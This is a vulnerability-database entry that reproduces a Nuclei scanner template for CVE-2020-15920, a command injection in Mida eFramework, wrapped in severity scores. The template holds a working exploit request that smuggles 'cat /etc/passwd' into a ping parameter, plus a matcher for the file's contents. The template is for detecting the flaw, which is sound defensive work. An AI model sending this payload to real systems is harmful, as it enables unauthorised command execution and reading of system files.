Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-15920
HistorySep 01, 2020 - 6:38 p.m.

Mida eFramework <=2.9.0 - Remote Command Execution

2020-09-0118:38:31
ProjectDiscovery
github.com
3

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

AI Score

Confidence

High

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.972 High

EPSS

Percentile

99.8%

Mida eFramework through 2.9.0 allows an attacker to achieve remote code execution with administrative (root) privileges. No authentication is required.

id: CVE-2020-15920

info:
  name: Mida eFramework <=2.9.0 - Remote Command Execution
  author: dwisiswant0
  severity: critical
  description: Mida eFramework through 2.9.0 allows an attacker to achieve remote code execution with administrative (root) privileges. No authentication is required.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
  remediation: |
    Upgrade Mida eFramework to a version higher than 2.9.0 to mitigate the vulnerability.
  reference:
    - https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
    - http://packetstormsecurity.com/files/158991/Mida-eFramework-2.9.0-Remote-Code-Execution.html
    - http://packetstormsecurity.com/files/159194/Mida-Solutions-eFramework-ajaxreq.php-Command-Injection.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-15920
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-15920
    cwe-id: CWE-78
    epss-score: 0.9722
    epss-percentile: 0.998
    cpe: cpe:2.3:a:midasolutions:eframework:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: midasolutions
    product: eframework
  tags: cve2020,cve,mida,rce,packetstorm,midasolutions

http:
  - method: POST
    path:
      - "{{BaseURL}}/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502206f5a3ec45a1ae6604575d375e689df1c77957a24b7578c7ad5847a39d7570683022100cfa88e83a5104ca5de5e02b21eadad357a26dd37838c9c77f95c643dc5296f39:922c64590222798bb761d5b6d8e72950

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

AI Score

Confidence

High

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.972 High

EPSS

Percentile

99.8%

Related for NUCLEI:CVE-2020-15920